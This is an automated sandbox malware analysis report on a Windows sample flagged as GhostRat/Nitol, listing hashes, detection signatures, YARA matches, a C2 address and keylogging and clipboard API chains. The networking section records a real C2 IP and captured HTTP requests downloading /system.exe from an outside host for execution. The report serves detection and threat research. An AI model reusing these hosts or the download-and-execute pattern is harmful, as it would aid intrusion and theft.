Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Analysis ID: 1537400
MD5: b36366f4a27987d6de47887b03f29c68
SHA1: 6f290bd6c132ec5c824558a29bdf75d25ced94e3
SHA256: 4cc1ab70e6fd0d4441c778d40212c6e3114e14d56da85717214f8498e1c1501b
Tags: exe, Nitol

Detection

GhostRat, Nitol, Young Lotus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
Yara detected Young Lotus
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Contains functionality to capture and log keystrokes
Hides threads from debuggers
Machine Learning detection for sample
PE file has a writeable .text section
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries device information via Setup API
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cleanup

Malware configuration (GhostRat): {"C2 url": "110.40.45.163"}
Source | Rule | Description | Author | Strings
00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Gh0st_ee6de6bc | Identifies a variant of Gh0st Rat | unknown
  • 0xbb2:$a1: :]%d-%d-%d %d:%d:%d
  • 0x970:$a2: [Pause Break]
  • 0x1a54:$a3: f-secure.exe
  • 0x13e:$a4: Accept-Language: zh-cn
00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
[34 entries in total; only the first are shown]
Source | Rule | Description | Author | Strings
4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack | JoeSecurity_YoungLotus | Yara detected Young Lotus | Joe Security
4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack | Windows_Trojan_Gh0st_ee6de6bc | Identifies a variant of Gh0st Rat | unknown
  • 0x12bb2:$a1: :]%d-%d-%d %d:%d:%d
  • 0x12970:$a2: [Pause Break]
  • 0x13a54:$a3: f-secure.exe
  • 0x1213e:$a4: Accept-Language: zh-cn
4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
  • 0x1229b:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
  • 0x12338:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
  • 0x1221c:$s1: \Program Files\Internet Explorer\iexplore.exe
  • 0x1213e:$s5: Accept-Language: zh-cn
[58 entries in total; only the first are shown]

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, ProcessId: 1476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dhttdfv.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T22:25:41.952742+0200 | 2843729 | 1 | A Network Trojan was detected | 192.168.2.5 | 49796 | 110.40.45.163 | 70 | TCP

AV Detection

Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Avira: detected
Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack | Malware Configuration Extractor: GhostRat {"C2 url": "110.40.45.163"}
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: iphlpapi.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2160765089.0000000002264000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \Server\Release\Xy.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.000000000041F000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: wkernelbase.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, [:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,0_2_00409457
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,0_2_1000140B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,4_2_00409457
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,4_2_1000140B

Networking

Source: Network traffic | Suricata IDS: 2843729 - Severity 1 - ETPRO MALWARE Win32/Fsysna.hlwd CnC Checkin : 192.168.2.5:49796 -> 110.40.45.163:70
Source: Malware configuration extractor | URLs: 110.40.45.163
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0041200B URLDownloadToFileA,ShellExecuteA,0_2_0041200B
Source: global traffic | TCP traffic: 192.168.2.5:49796 -> 110.40.45.163:70
Source: Joe Sandbox View | IP Address: 106.52.15.123
Source: Joe Sandbox View | ASN Name: YLWLBeijingYunlinNetworkTechnologyCoLtdCN
Source: global traffic | HTTP traffic detected (3 occurrences):
  GET /system.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 106.52.15.123
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 106.52.15.123 (15 occurrences)
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/H
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://106.52.15.123/system.exe
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exe.
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exe?
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://106.52.15.123/system.exeC:
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exeON%L
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exeW-
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.000000000065A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exea
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exed
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exeuNoL
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exex
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/system.exez
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://106.52.15.123/y
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comU
Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.000000000065A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comg=ZY

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: <BackSpace> | 0_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: <Enter> | 0_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: <BackSpace> | 4_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: <Enter> | 4_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_00409850 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_mbscpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_00409850 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_mbscpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10001804 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_00409850 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_mbscpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_10001804 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_004093DE OpenClipboard,GetClipboardData,GlobalLock,strlen,GlobalUnlock,CloseClipboard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040CB7D memset,Sleep,lstrlen,memset,memset,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlen,lstrcat,memset,lstrcat
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: DirectInput8Create | memstr_6c2b514b-0
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: GetRawInputData | memstr_f738f4da-c
                Source: Yara match | File source: 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR

                E-Banking Fraud

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command | 0_2_100058CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command | 4_2_100058CF

                System Summary

                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
